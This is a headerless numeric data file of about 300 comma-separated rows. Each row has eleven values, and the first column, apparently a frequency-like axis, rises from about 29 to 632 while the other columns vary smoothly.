29.48,1.41,-1.43,1.41,-1.42,1.42,0.68,1.85,2.83,2.83,2.84
29.78,1.46,-1.38,1.46,-1.38,1.37,0.65,1.86,2.83,2.83,2.84
30.08,1.51,-1.34,1.51,-1.34,1.33,0.62,1.86,2.84,2.84,2.85
30.38,1.56,-1.29,1.57,-1.29,1.29,0.59,1.87,2.85,2.85,2.85
30.68,1.62,-1.24,1.62,-1.24,1.24,0.56,1.87,2.87,2.86,2.87
30.99,1.67,-1.19,1.67,-1.20,1.20,0.53,1.86,2.87,2.87,2.86
31.30,1.71,-1.16,1.72,-1.16,1.16,0.51,1.86,2.87,2.88,2.87
31.61,1.76,-1.12,1.76,-1.12,1.12,0.48,1.85,2.88,2.88,2.88
31.93,1.80,-1.09,1.80,-1.09,1.09,0.46,1.83,2.89,2.89,2.89
32.24,1.84,-1.05,1.85,-1.05,1.05,0.43,1.81,2.89,2.89,2.89
32.57,1.89,-1.02,1.89,-1.01,1.01,0.41,1.79,2.90,2.90,2.91
32.89,1.94,-0.97,1.94,-0.98,0.98,0.39,1.77,2.92,2.91,2.92
33.22,1.98,-0.94,1.99,-0.94,0.94,0.37,1.74,2.92,2.92,2.92
33.55,2.03,-0.90,2.03,-0.90,0.90,0.35,1.71,2.93,2.93,2.93
33.89,2.08,-0.86,2.08,-0.86,0.86,0.33,1.67,2.94,2.94,2.94
34.23,2.13,-0.82,2.13,-0.82,0.82,0.31,1.64,2.95,2.95,2.95
34.57,2.17,-0.79,2.17,-0.78,0.78,0.30,1.60,2.95,2.95,2.96
34.92,2.22,-0.73,2.22,-0.74,0.74,0.28,1.56,2.96,2.96,2.96
35.27,2.26,-0.70,2.27,-0.70,0.70,0.26,1.51,2.96,2.96,2.96
35.62,2.31,-0.66,2.31,-0.66,0.66,0.25,1.47,2.97,2.97,2.97
35.97,2.36,-0.61,2.35,-0.62,0.62,0.23,1.42,2.99,2.98,2.97
36.33,2.39,-0.59,2.39,-0.58,0.59,0.22,1.37,2.98,2.98,2.98
36.70,2.42,-0.55,2.43,-0.55,0.55,0.20,1.32,2.97,2.98,2.98
37.06,2.46,-0.52,2.46,-0.53,0.52,0.19,1.27,2.98,2.98,2.98
37.43,2.49,-0.50,2.50,-0.49,0.48,0.17,1.22,2.98,2.98,2.99
37.81,2.53,-0.46,2.53,-0.46,0.45,0.16,1.17,2.98,2.98,2.99
38.19,2.57,-0.41,2.57,-0.42,0.42,0.14,1.11,2.99,2.99,2.99
38.57,2.60,-0.38,2.60,-0.38,0.39,0.13,1.06,2.99,2.99,2.98
38.95,2.63,-0.35,2.63,-0.35,0.35,0.12,1.00,2.99,2.98,2.98
39.34,2.65,-0.32,2.66,-0.32,0.32,0.10,0.95,2.98,2.98,2.98
39.74,2.68,-0.29,2.68,-0.29,0.29,0.09,0.90,2.98,2.98,2.97
40.14,2.71,-0.27,2.71,-0.27,0.27,0.08,0.84,2.98,2.98,2.98
40.54,2.73,-0.25,2.73,-0.24,0.25,0.06,0.79,2.98,2.98,2.98
40.94,2.75,-0.22,2.75,-0.22,0.23,0.05,0.73,2.98,2.98,2.97
41.35,2.77,-0.20,2.77,-0.20,0.20,0.04,0.68,2.98,2.98,2.97
41.76,2.79,-0.18,2.79,-0.18,0.18,0.02,0.62,2.97,2.97,2.98
42.18,2.81,-0.17,2.82,-0.16,0.16,0.01,0.57,2.97,2.98,2.98
42.60,2.84,-0.14,2.84,-0.14,0.14,-0.01,0.52,2.98,2.98,2.98
43.03,2.87,-0.11,2.87,-0.11,0.11,-0.02,0.46,2.98,2.98,2.98
43.46,2.89,-0.09,2.89,-0.08,0.08,-0.04,0.41,2.97,2.97,2.98
43.90,2.91,-0.05,2.92,-0.05,0.05,-0.05,0.36,2.96,2.97,2.97
44.33,2.95,-0.02,2.95,-0.02,0.02,-0.07,0.31,2.97,2.96,2.97
44.78,2.98,0.02,2.98,0.02,-0.02,-0.08,0.25,2.97,2.97,2.97
45.23,3.02,0.06,3.02,0.06,-0.05,-0.10,0.20,2.98,2.97,2.96
45.68,3.05,0.09,3.05,0.09,-0.08,-0.12,0.15,2.98,2.98,2.97
46.13,3.08,0.12,3.08,0.11,-0.10,-0.14,0.10,2.98,2.97,2.96
46.60,3.10,0.13,3.10,0.14,-0.14,-0.16,0.05,2.97,2.97,2.97
47.06,3.12,0.15,3.13,0.16,-0.17,-0.18,-0.00,2.95,2.96,2.97
47.53,3.16,0.20,3.16,0.19,-0.20,-0.20,-0.05,2.96,2.96,2.96
48.01,3.19,0.22,3.19,0.23,-0.24,-0.22,-0.10,2.95,2.95,2.98
48.49,3.23,0.27,3.23,0.27,-0.28,-0.24,-0.15,2.95,2.95,2.96
48.97,3.27,0.33,3.27,0.33,-0.32,-0.27,-0.20,2.95,2.95,2.94
49.46,3.31,0.38,3.31,0.38,-0.37,-0.29,-0.25,2.94,2.94,2.94
49.96,3.35,0.43,3.35,0.42,-0.42,-0.32,-0.30,2.93,2.93,2.92
50.46,3.38,0.46,3.39,0.47,-0.46,-0.35,-0.35,2.92,2.92,2.92
50.96,3.42,0.51,3.42,0.52,-0.51,-0.39,-0.39,2.91,2.91,2.91
51.47,3.45,0.57,3.45,0.56,-0.56,-0.42,-0.44,2.89,2.89,2.88
51.99,3.48,0.61,3.49,0.61,-0.61,-0.46,-0.49,2.87,2.88,2.88
52.51,3.52,0.64,3.52,0.65,-0.66,-0.50,-0.53,2.86,2.86,2.88
53.03,3.56,0.70,3.56,0.70,-0.71,-0.54,-0.57,2.85,2.85,2.86
53.56,3.60,0.75,3.60,0.75,-0.76,-0.59,-0.62,2.84,2.84,2.85
54.10,3.64,0.81,3.64,0.81,-0.81,-0.64,-0.66,2.84,2.83,2.83
54.64,3.67,0.85,3.68,0.86,-0.85,-0.69,-0.70,2.82,2.82,2.82
55.18,3.71,0.91,3.71,0.91,-0.90,-0.75,-0.74,2.81,2.81,2.80
55.74,3.74,0.96,3.74,0.95,-0.95,-0.81,-0.78,2.79,2.79,2.78
56.29,3.76,0.99,3.76,0.99,-1.00,-0.87,-0.82,2.77,2.77,2.78
56.86,3.78,1.03,3.79,1.03,-1.04,-0.94,-0.86,2.74,2.75,2.75
57.42,3.81,1.08,3.81,1.07,-1.08,-1.01,-0.89,2.73,2.73,2.73
58.00,3.84,1.12,3.84,1.12,-1.12,-1.08,-0.92,2.72,2.72,2.72
58.58,3.87,1.16,3.87,1.16,-1.16,-1.16,-0.95,2.71,2.71,2.71
59.16,3.89,1.20,3.89,1.20,-1.19,-1.23,-0.98,2.70,2.70,2.69
59.76,3.91,1.23,3.91,1.23,-1.23,-1.31,-1.01,2.68,2.68,2.68
60.35,3.91,1.26,3.92,1.26,-1.26,-1.38,-1.04,2.65,2.65,2.66
60.96,3.92,1.29,3.92,1.29,-1.30,-1.44,-1.06,2.62,2.62,2.63
61.57,3.92,1.32,3.92,1.32,-1.33,-1.50,-1.08,2.59,2.59,2.60
62.18,3.92,1.36,3.92,1.36,-1.36,-1.55,-1.10,2.56,2.57,2.56
62.80,3.92,1.38,3.92,1.38,-1.38,-1.58,-1.12,2.54,2.54,2.55
63.43,3.92,1.41,3.92,1.41,-1.41,-1.60,-1.13,2.52,2.51,2.51
64.07,3.91,1.43,3.91,1.43,-1.42,-1.61,-1.15,2.49,2.49,2.48
64.71,3.90,1.45,3.90,1.45,-1.44,-1.60,-1.16,2.46,2.46,2.45
65.35,3.88,1.45,3.88,1.45,-1.45,-1.58,-1.17,2.43,2.43,2.43
66.01,3.85,1.45,3.85,1.45,-1.45,-1.54,-1.18,2.40,2.40,2.40
66.67,3.82,1.44,3.82,1.44,-1.45,-1.49,-1.18,2.37,2.37,2.38
67.33,3.78,1.43,3.79,1.44,-1.45,-1.44,-1.19,2.33,2.34,2.35
68.01,3.75,1.43,3.75,1.43,-1.44,-1.38,-1.19,2.31,2.31,2.32
68.69,3.72,1.43,3.72,1.43,-1.43,-1.32,-1.19,2.30,2.29,2.29
69.37,3.67,1.41,3.67,1.42,-1.41,-1.25,-1.19,2.26,2.26,2.26
70.07,3.62,1.40,3.62,1.39,-1.39,-1.19,-1.19,2.23,2.23,2.23
70.77,3.56,1.36,3.56,1.36,-1.36,-1.12,-1.19,2.20,2.20,2.20
71.48,3.50,1.32,3.50,1.33,-1.33,-1.06,-1.19,2.18,2.17,2.18
72.19,3.43,1.29,3.44,1.29,-1.29,-1.00,-1.18,2.15,2.15,2.15
72.91,3.37,1.25,3.37,1.24,-1.24,-0.95,-1.18,2.13,2.13,2.12
73.64,3.29,1.19,3.29,1.19,-1.19,-0.90,-1.18,2.10,2.10,2.10
74.38,3.21,1.13,3.21,1.13,-1.13,-0.85,-1.17,2.08,2.08,2.08
75.12,3.13,1.08,3.13,1.07,-1.08,-0.81,-1.17,2.06,2.05,2.06
75.87,3.04,1.00,3.05,1.01,-1.02,-0.77,-1.17,2.03,2.03,2.04
76.63,2.97,0.95,2.97,0.95,-0.95,-0.74,-1.16,2.02,2.02,2.02
77.40,2.89,0.89,2.89,0.89,-0.89,-0.70,-1.16,2.00,2.01,2.00
78.17,2.82,0.84,2.82,0.83,-0.82,-0.68,-1.16,2.00,2.00,1.99
78.95,2.73,0.75,2.73,0.76,-0.75,-0.65,-1.15,1.98,1.98,1.98
79.74,2.65,0.68,2.65,0.69,-0.68,-0.63,-1.15,1.97,1.97,1.97
80.54,2.57,0.61,2.57,0.61,-0.61,-0.61,-1.15,1.96,1.96,1.96
81.35,2.49,0.55,2.49,0.54,-0.55,-0.59,-1.15,1.95,1.95,1.95
82.16,2.41,0.48,2.41,0.47,-0.48,-0.57,-1.15,1.93,1.93,1.94
82.98,2.34,0.41,2.34,0.41,-0.42,-0.56,-1.15,1.92,1.92,1.93
83.81,2.27,0.35,2.27,0.35,-0.36,-0.55,-1.16,1.91,1.92,1.92
84.65,2.21,0.30,2.22,0.30,-0.30,-0.54,-1.16,1.91,1.92,1.91
85.50,2.17,0.26,2.17,0.25,-0.25,-0.53,-1.16,1.92,1.92,1.91
86.35,2.12,0.21,2.12,0.21,-0.20,-0.53,-1.17,1.92,1.92,1.91
87.22,2.07,0.17,2.07,0.17,-0.16,-0.53,-1.17,1.91,1.91,1.91
88.09,2.03,0.13,2.03,0.12,-0.13,-0.52,-1.18,1.90,1.90,1.90
88.97,1.99,0.09,1.99,0.09,-0.10,-0.52,-1.19,1.89,1.90,1.91
89.86,1.97,0.06,1.97,0.07,-0.08,-0.53,-1.20,1.89,1.89,1.91
90.76,1.96,0.07,1.96,0.06,-0.06,-0.53,-1.21,1.90,1.90,1.89
91.66,1.96,0.06,1.96,0.07,-0.06,-0.53,-1.22,1.90,1.91,1.90
92.58,1.97,0.08,1.97,0.07,-0.06,-0.54,-1.23,1.91,1.90,1.89
93.51,1.98,0.08,1.98,0.08,-0.08,-0.55,-1.24,1.90,1.90,1.90
94.44,1.99,0.10,2.00,0.10,-0.11,-0.55,-1.25,1.88,1.89,1.90
95.39,2.02,0.12,2.03,0.13,-0.15,-0.57,-1.27,1.87,1.88,1.90
96.34,2.07,0.19,2.07,0.18,-0.20,-0.58,-1.28,1.88,1.87,1.88
97.30,2.12,0.25,2.12,0.25,-0.25,-0.59,-1.30,1.87,1.87,1.87
98.28,2.17,0.31,2.18,0.31,-0.31,-0.61,-1.31,1.86,1.87,1.86
99.26,2.23,0.38,2.23,0.38,-0.37,-0.62,-1.33,1.86,1.86,1.85
100.25,2.29,0.45,2.29,0.44,-0.43,-0.64,-1.35,1.86,1.86,1.85
101.25,2.34,0.51,2.34,0.51,-0.49,-0.66,-1.37,1.85,1.85,1.84
102.27,2.39,0.57,2.38,0.56,-0.55,-0.69,-1.38,1.84,1.83,1.82
103.29,2.41,0.61,2.42,0.61,-0.61,-0.71,-1.40,1.80,1.81,1.80
104.32,2.44,0.65,2.45,0.66,-0.67,-0.74,-1.42,1.78,1.78,1.79
105.37,2.48,0.71,2.48,0.71,-0.72,-0.77,-1.44,1.76,1.76,1.77
106.42,2.52,0.78,2.52,0.77,-0.78,-0.80,-1.45,1.74,1.73,1.74
107.48,2.55,0.83,2.55,0.84,-0.85,-0.83,-1.47,1.70,1.71,1.72
108.56,2.59,0.91,2.60,0.91,-0.92,-0.86,-1.49,1.67,1.68,1.68
109.64,2.64,0.99,2.64,0.99,-0.99,-0.90,-1.50,1.65,1.65,1.65
110.74,2.69,1.07,2.69,1.07,-1.07,-0.94,-1.52,1.63,1.62,1.62
111.85,2.73,1.15,2.73,1.15,-1.14,-0.98,-1.53,1.59,1.59,1.58
112.97,2.77,1.24,2.77,1.23,-1.22,-1.03,-1.54,1.55,1.55,1.53
114.10,2.79,1.29,2.80,1.30,-1.30,-1.08,-1.55,1.49,1.50,1.51
115.24,2.83,1.37,2.83,1.37,-1.38,-1.13,-1.56,1.45,1.45,1.46
116.39,2.85,1.44,2.85,1.44,-1.45,-1.18,-1.57,1.40,1.40,1.41
117.55,2.88,1.51,2.89,1.52,-1.52,-1.23,-1.57,1.36,1.37,1.37
118.73,2.91,1.59,2.91,1.58,-1.58,-1.28,-1.58,1.33,1.34,1.32
119.92,2.94,1.64,2.93,1.64,-1.63,-1.34,-1.58,1.31,1.30,1.30
121.12,2.94,1.69,2.94,1.69,-1.67,-1.40,-1.57,1.27,1.27,1.25
122.33,2.93,1.72,2.94,1.72,-1.71,-1.45,-1.57,1.23,1.23,1.21
123.55,2.92,1.73,2.92,1.73,-1.73,-1.51,-1.56,1.19,1.18,1.19
124.79,2.89,1.74,2.89,1.74,-1.75,-1.56,-1.55,1.15,1.14,1.15
126.03,2.85,1.73,2.86,1.74,-1.75,-1.61,-1.53,1.10,1.11,1.12
127.29,2.83,1.75,2.83,1.75,-1.75,-1.66,-1.52,1.08,1.08,1.08
128.57,2.80,1.76,2.79,1.75,-1.75,-1.71,-1.50,1.06,1.05,1.04
129.85,2.75,1.74,2.75,1.74,-1.74,-1.74,-1.48,1.02,1.02,1.02
131.15,2.70,1.72,2.71,1.73,-1.72,-1.77,-1.45,0.98,0.99,0.98
132.46,2.67,1.71,2.66,1.70,-1.70,-1.80,-1.43,0.97,0.96,0.96
133.79,2.62,1.68,2.62,1.68,-1.68,-1.81,-1.40,0.94,0.94,0.94
135.12,2.56,1.65,2.57,1.65,-1.66,-1.82,-1.36,0.90,0.91,0.91
136.48,2.51,1.63,2.50,1.62,-1.63,-1.82,-1.33,0.88,0.87,0.89
137.84,2.44,1.59,2.45,1.60,-1.60,-1.81,-1.29,0.84,0.85,0.86
139.22,2.39,1.57,2.39,1.57,-1.57,-1.78,-1.25,0.82,0.83,0.83
140.61,2.35,1.55,2.34,1.54,-1.53,-1.76,-1.21,0.82,0.81,0.80
142.02,2.28,1.49,2.29,1.51,-1.49,-1.72,-1.17,0.79,0.80,0.79
143.44,2.24,1.47,2.23,1.47,-1.46,-1.68,-1.13,0.78,0.77,0.77
144.87,2.16,1.42,2.16,1.42,-1.42,-1.63,-1.08,0.74,0.74,0.74
146.32,2.10,1.38,2.10,1.38,-1.39,-1.57,-1.04,0.72,0.72,0.72
147.78,2.03,1.33,2.03,1.34,-1.35,-1.52,-0.99,0.68,0.68,0.70
149.26,1.98,1.31,1.98,1.31,-1.32,-1.46,-0.94,0.66,0.66,0.67
150.75,1.92,1.29,1.92,1.29,-1.29,-1.39,-0.90,0.63,0.63,0.63
152.26,1.88,1.28,1.88,1.27,-1.27,-1.33,-0.85,0.62,0.61,0.61
153.78,1.82,1.24,1.83,1.25,-1.25,-1.27,-0.80,0.58,0.58,0.58
155.32,1.78,1.24,1.78,1.23,-1.23,-1.21,-0.75,0.55,0.55,0.54
156.88,1.72,1.21,1.72,1.21,-1.21,-1.14,-0.70,0.51,0.51,0.52
158.44,1.67,1.19,1.67,1.20,-1.20,-1.08,-0.65,0.47,0.47,0.48
160.03,1.62,1.18,1.63,1.18,-1.19,-1.02,-0.59,0.44,0.44,0.44
161.63,1.59,1.19,1.59,1.18,-1.17,-0.97,-0.54,0.42,0.41,0.40
163.24,1.54,1.17,1.54,1.16,-1.16,-0.91,-0.49,0.38,0.38,0.37
164.88,1.48,1.14,1.49,1.15,-1.14,-0.86,-0.44,0.34,0.34,0.34
166.53,1.42,1.12,1.43,1.12,-1.13,-0.81,-0.39,0.29,0.30,0.30
168.19,1.38,1.12,1.37,1.11,-1.12,-0.76,-0.34,0.27,0.26,0.26
169.87,1.31,1.09,1.32,1.10,-1.10,-0.71,-0.29,0.21,0.22,0.23
171.57,1.27,1.08,1.27,1.08,-1.09,-0.67,-0.23,0.18,0.18,0.19
173.29,1.22,1.08,1.21,1.07,-1.07,-0.63,-0.18,0.15,0.14,0.14
175.02,1.14,1.04,1.15,1.05,-1.05,-0.59,-0.13,0.09,0.10,0.10
176.77,1.08,1.03,1.08,1.03,-1.03,-0.55,-0.08,0.05,0.05,0.05
178.54,1.01,1.01,1.02,1.01,-1.00,-0.51,-0.03,0.01,0.01,0.00
180.32,0.94,0.98,0.94,0.98,-0.97,-0.48,0.02,-0.03,-0.03,-0.04
182.13,0.86,0.95,0.85,0.94,-0.93,-0.44,0.07,-0.06,-0.08,-0.09
183.95,0.73,0.87,0.74,0.88,-0.88,-0.41,0.12,-0.14,-0.13,-0.14
185.79,0.62,0.81,0.63,0.82,-0.82,-0.38,0.17,-0.20,-0.19,-0.19
187.65,0.51,0.76,0.51,0.75,-0.75,-0.35,0.23,-0.24,-0.25,-0.25
189.52,0.39,0.68,0.39,0.68,-0.69,-0.32,0.28,-0.29,-0.29,-0.29
191.42,0.27,0.61,0.28,0.61,-0.61,-0.29,0.33,-0.34,-0.34,-0.33
193.33,0.16,0.54,0.16,0.53,-0.54,-0.26,0.38,-0.38,-0.38,-0.38
195.27,0.04,0.46,0.04,0.46,-0.46,-0.23,0.43,-0.42,-0.42,-0.42
197.22,-0.08,0.39,-0.08,0.39,-0.39,-0.21,0.48,-0.47,-0.47,-0.47
199.19,-0.20,0.32,-0.19,0.32,-0.32,-0.18,0.53,-0.51,-0.51,-0.52
201.18,-0.31,0.25,-0.31,0.25,-0.24,-0.15,0.58,-0.55,-0.55,-0.56
203.19,-0.42,0.17,-0.42,0.17,-0.18,-0.13,0.62,-0.59,-0.60,-0.59
205.23,-0.54,0.10,-0.53,0.10,-0.11,-0.10,0.67,-0.65,-0.64,-0.64
207.28,-0.64,0.02,-0.64,0.04,-0.04,-0.08,0.72,-0.68,-0.68,-0.66
209.35,-0.73,-0.02,-0.73,-0.01,0.01,-0.05,0.77,-0.71,-0.71,-0.71
211.44,-0.81,-0.05,-0.82,-0.07,0.07,-0.03,0.81,-0.74,-0.75,-0.76
213.56,-0.90,-0.11,-0.90,-0.12,0.12,-0.00,0.86,-0.78,-0.79,-0.79
215.69,-1.00,-0.19,-0.99,-0.17,0.17,0.02,0.90,-0.83,-0.82,-0.81
217.85,-1.07,-0.23,-1.06,-0.22,0.21,0.05,0.94,-0.86,-0.85,-0.84
220.03,-1.13,-0.25,-1.13,-0.25,0.26,0.08,0.99,-0.87,-0.87,-0.88
222.23,-1.19,-0.28,-1.19,-0.29,0.31,0.10,1.03,-0.88,-0.88,-0.91
224.45,-1.27,-0.34,-1.27,-0.35,0.36,0.13,1.06,-0.91,-0.91,-0.93
226.70,-1.36,-0.42,-1.36,-0.41,0.41,0.16,1.10,-0.95,-0.95,-0.94
228.96,-1.45,-0.48,-1.43,-0.47,0.46,0.19,1.13,-0.99,-0.98,-0.97
231.25,-1.50,-0.52,-1.50,-0.53,0.51,0.22,1.17,-0.99,-0.99,-0.98
233.57,-1.56,-0.57,-1.56,-0.57,0.56,0.26,1.20,-1.00,-1.00,-0.99
235.90,-1.63,-0.62,-1.62,-0.62,0.62,0.29,1.22,-1.01,-1.01,-1.01
238.26,-1.68,-0.67,-1.68,-0.67,0.67,0.33,1.25,-1.01,-1.01,-1.01
240.64,-1.74,-0.72,-1.73,-0.72,0.73,0.37,1.27,-1.01,-1.01,-1.02
243.05,-1.79,-0.77,-1.80,-0.78,0.79,0.41,1.29,-1.00,-1.01,-1.01
245.48,-1.86,-0.84,-1.86,-0.84,0.85,0.45,1.31,-1.01,-1.01,-1.02
247.93,-1.95,-0.93,-1.93,-0.92,0.92,0.50,1.33,-1.03,-1.02,-1.01
250.41,-2.00,-0.98,-2.01,-1.00,0.99,0.55,1.34,-1.01,-1.02,-1.02
252.92,-2.08,-1.07,-2.07,-1.07,1.06,0.60,1.35,-1.02,-1.01,-1.00
255.45,-2.14,-1.15,-2.14,-1.14,1.14,0.66,1.35,-1.00,-0.99,-0.99
258.00,-2.20,-1.22,-2.20,-1.22,1.23,0.72,1.36,-0.97,-0.98,-0.98
260.58,-2.28,-1.30,-2.28,-1.30,1.32,0.79,1.36,-0.96,-0.96,-0.98
263.19,-2.36,-1.40,-2.36,-1.40,1.41,0.86,1.36,-0.95,-0.95,-0.96
265.82,-2.46,-1.50,-2.45,-1.50,1.51,0.94,1.35,-0.95,-0.94,-0.95
268.48,-2.54,-1.61,-2.54,-1.61,1.61,1.02,1.35,-0.93,-0.93,-0.93
271.16,-2.62,-1.71,-2.64,-1.72,1.72,1.11,1.34,-0.90,-0.92,-0.91
273.87,-2.74,-1.83,-2.73,-1.83,1.82,1.21,1.33,-0.91,-0.90,-0.90
276.61,-2.83,-1.95,-2.82,-1.94,1.93,1.31,1.32,-0.90,-0.89,-0.88
279.38,-2.90,-2.03,-2.90,-2.03,2.03,1.42,1.30,-0.87,-0.87,-0.87
282.17,-2.97,-2.11,-2.97,-2.12,2.12,1.54,1.29,-0.85,-0.85,-0.85
284.99,-3.04,-2.20,-3.04,-2.20,2.20,1.66,1.27,-0.83,-0.84,-0.84
287.84,-3.12,-2.29,-3.11,-2.28,2.28,1.79,1.26,-0.84,-0.83,-0.83
290.72,-3.16,-2.35,-3.16,-2.35,2.35,1.93,1.24,-0.81,-0.81,-0.81
293.63,-3.20,-2.40,-3.20,-2.40,2.40,2.06,1.22,-0.80,-0.80,-0.80
296.57,-3.23,-2.45,-3.23,-2.45,2.45,2.20,1.20,-0.78,-0.78,-0.78
299.53,-3.26,-2.49,-3.26,-2.49,2.48,2.33,1.18,-0.77,-0.77,-0.77
302.53,-3.28,-2.52,-3.27,-2.52,2.51,2.45,1.16,-0.77,-0.76,-0.76
305.55,-3.27,-2.53,-3.27,-2.53,2.53,2.56,1.14,-0.74,-0.74,-0.73
308.61,-3.26,-2.53,-3.26,-2.53,2.54,2.65,1.12,-0.72,-0.72,-0.73
311.69,-3.24,-2.52,-3.24,-2.53,2.54,2.72,1.10,-0.70,-0.71,-0.72
314.81,-3.23,-2.54,-3.22,-2.52,2.53,2.76,1.08,-0.70,-0.70,-0.69
317.96,-3.20,-2.51,-3.20,-2.51,2.51,2.77,1.06,-0.69,-0.69,-0.69
321.14,-3.18,-2.49,-3.18,-2.49,2.49,2.75,1.04,-0.69,-0.69,-0.68
324.35,-3.14,-2.45,-3.14,-2.46,2.46,2.70,1.02,-0.68,-0.68,-0.69
327.59,-3.10,-2.43,-3.10,-2.42,2.42,2.63,1.00,-0.68,-0.68,-0.67
330.87,-3.05,-2.38,-3.05,-2.38,2.38,2.54,0.98,-0.67,-0.67,-0.67
334.18,-3.00,-2.33,-3.00,-2.33,2.33,2.42,0.96,-0.67,-0.67,-0.67
337.52,-2.94,-2.28,-2.94,-2.28,2.28,2.30,0.95,-0.66,-0.66,-0.66
340.90,-2.88,-2.22,-2.88,-2.22,2.22,2.17,0.93,-0.66,-0.66,-0.65
344.30,-2.81,-2.15,-2.81,-2.16,2.16,2.04,0.91,-0.65,-0.66,-0.66
347.75,-2.75,-2.09,-2.75,-2.09,2.09,1.90,0.90,-0.66,-0.66,-0.66
351.23,-2.68,-2.02,-2.68,-2.02,2.02,1.77,0.88,-0.66,-0.66,-0.66
354.74,-2.61,-1.95,-2.61,-1.95,1.95,1.65,0.87,-0.66,-0.66,-0.66
358.28,-2.54,-1.87,-2.54,-1.87,1.88,1.53,0.86,-0.66,-0.66,-0.67
361.87,-2.48,-1.81,-2.47,-1.80,1.80,1.42,0.85,-0.68,-0.67,-0.67
365.49,-2.40,-1.73,-2.41,-1.73,1.73,1.32,0.83,-0.67,-0.68,-0.67
369.14,-2.34,-1.66,-2.33,-1.65,1.65,1.22,0.82,-0.69,-0.68,-0.68
372.83,-2.27,-1.58,-2.26,-1.57,1.58,1.13,0.81,-0.69,-0.68,-0.68
376.56,-2.18,-1.48,-2.19,-1.50,1.50,1.05,0.80,-0.68,-0.69,-0.70
380.33,-2.12,-1.42,-2.12,-1.42,1.43,0.97,0.80,-0.69,-0.69,-0.70
384.13,-2.06,-1.35,-2.06,-1.35,1.36,0.90,0.79,-0.70,-0.70,-0.71
387.97,-2.01,-1.29,-2.00,-1.29,1.28,0.83,0.78,-0.72,-0.72,-0.72
391.85,-1.94,-1.21,-1.94,-1.22,1.21,0.77,0.77,-0.72,-0.72,-0.73
395.77,-1.87,-1.15,-1.87,-1.15,1.15,0.72,0.77,-0.72,-0.73,-0.72
399.73,-1.81,-1.08,-1.81,-1.08,1.08,0.67,0.76,-0.73,-0.73,-0.73
403.72,-1.75,-1.01,-1.75,-1.01,1.01,0.62,0.76,-0.74,-0.74,-0.74
407.76,-1.69,-0.94,-1.69,-0.94,0.94,0.58,0.75,-0.75,-0.75,-0.75
411.84,-1.62,-0.88,-1.62,-0.87,0.86,0.54,0.75,-0.75,-0.75,-0.74
415.96,-1.55,-0.80,-1.55,-0.80,0.79,0.50,0.74,-0.76,-0.76,-0.75
420.12,-1.48,-0.72,-1.48,-0.73,0.72,0.47,0.74,-0.76,-0.76,-0.75
424.32,-1.41,-0.65,-1.41,-0.65,0.65,0.43,0.74,-0.75,-0.76,-0.75
428.56,-1.35,-0.58,-1.34,-0.58,0.59,0.40,0.73,-0.76,-0.75,-0.76
432.85,-1.28,-0.51,-1.28,-0.52,0.53,0.38,0.73,-0.75,-0.75,-0.77
437.18,-1.22,-0.45,-1.22,-0.46,0.47,0.35,0.72,-0.75,-0.76,-0.77
441.55,-1.18,-0.42,-1.18,-0.41,0.41,0.33,0.72,-0.77,-0.76,-0.76
445.96,-1.13,-0.37,-1.13,-0.37,0.36,0.30,0.72,-0.77,-0.77,-0.76
450.42,-1.09,-0.32,-1.08,-0.32,0.32,0.28,0.71,-0.77,-0.77,-0.77
454.93,-1.03,-0.27,-1.03,-0.27,0.27,0.26,0.71,-0.75,-0.76,-0.76
459.48,-0.99,-0.23,-0.99,-0.23,0.23,0.25,0.70,-0.75,-0.75,-0.76
464.07,-0.94,-0.19,-0.94,-0.19,0.20,0.23,0.69,-0.74,-0.75,-0.75
468.71,-0.91,-0.17,-0.91,-0.16,0.16,0.21,0.69,-0.75,-0.75,-0.74
473.40,-0.87,-0.13,-0.87,-0.13,0.13,0.20,0.68,-0.74,-0.74,-0.74
478.13,-0.83,-0.10,-0.83,-0.10,0.10,0.18,0.67,-0.73,-0.73,-0.73
482.91,-0.79,-0.06,-0.79,-0.07,0.07,0.17,0.66,-0.72,-0.72,-0.73
487.74,-0.76,-0.04,-0.76,-0.04,0.04,0.16,0.65,-0.71,-0.72,-0.72
492.62,-0.74,-0.03,-0.73,-0.02,0.02,0.14,0.64,-0.72,-0.72,-0.71
497.55,-0.71,0.00,-0.71,-0.00,-0.01,0.13,0.63,-0.71,-0.72,-0.71
502.52,-0.69,0.01,-0.69,0.02,-0.03,0.12,0.62,-0.71,-0.71,-0.70
507.55,-0.66,0.04,-0.66,0.04,-0.04,0.11,0.61,-0.70,-0.70,-0.70
512.62,-0.64,0.06,-0.64,0.06,-0.06,0.10,0.59,-0.69,-0.69,-0.70
517.75,-0.62,0.07,-0.62,0.08,-0.07,0.09,0.58,-0.68,-0.68,-0.69
522.93,-0.61,0.08,-0.61,0.08,-0.07,0.08,0.56,-0.68,-0.68,-0.69
528.16,-0.61,0.08,-0.61,0.08,-0.08,0.07,0.54,-0.68,-0.69,-0.69
533.44,-0.62,0.07,-0.62,0.08,-0.08,0.06,0.53,-0.70,-0.69,-0.69
538.77,-0.63,0.06,-0.62,0.07,-0.07,0.05,0.51,-0.70,-0.70,-0.69
544.16,-0.63,0.06,-0.63,0.06,-0.07,0.04,0.49,-0.70,-0.70,-0.69
549.60,-0.63,0.06,-0.63,0.07,-0.07,0.04,0.47,-0.70,-0.70,-0.69
555.10,-0.63,0.08,-0.63,0.07,-0.07,0.03,0.45,-0.70,-0.70,-0.70
560.65,-0.63,0.08,-0.63,0.07,-0.08,0.02,0.42,-0.70,-0.71,-0.70
566.25,-0.63,0.07,-0.63,0.07,-0.08,0.01,0.40,-0.71,-0.71,-0.69
571.92,-0.63,0.08,-0.62,0.08,-0.09,0.00,0.38,-0.72,-0.71,-0.70
577.64,-0.62,0.10,-0.62,0.09,-0.09,-0.00,0.35,-0.71,-0.71,-0.71
583.41,-0.61,0.11,-0.61,0.10,-0.09,-0.01,0.33,-0.70,-0.71,-0.71
589.25,-0.61,0.10,-0.61,0.10,-0.09,-0.02,0.31,-0.70,-0.70,-0.70
595.14,-0.62,0.09,-0.62,0.09,-0.08,-0.02,0.28,-0.70,-0.70,-0.70
601.09,-0.63,0.08,-0.63,0.07,-0.07,-0.03,0.26,-0.70,-0.70,-0.70
607.10,-0.65,0.05,-0.65,0.05,-0.04,-0.04,0.23,-0.69,-0.69,-0.69
613.17,-0.67,0.02,-0.67,0.02,-0.01,-0.04,0.20,-0.68,-0.68,-0.69
619.30,-0.70,-0.02,-0.70,-0.02,0.02,-0.05,0.18,-0.67,-0.67,-0.68
625.50,-0.73,-0.06,-0.73,-0.06,0.07,-0.06,0.15,-0.66,-0.66,-0.67
631.75,-0.77,-0.10,-0.77,-0.11,0.11,-0.06,0.12,-0.66,-0.66,-0.67
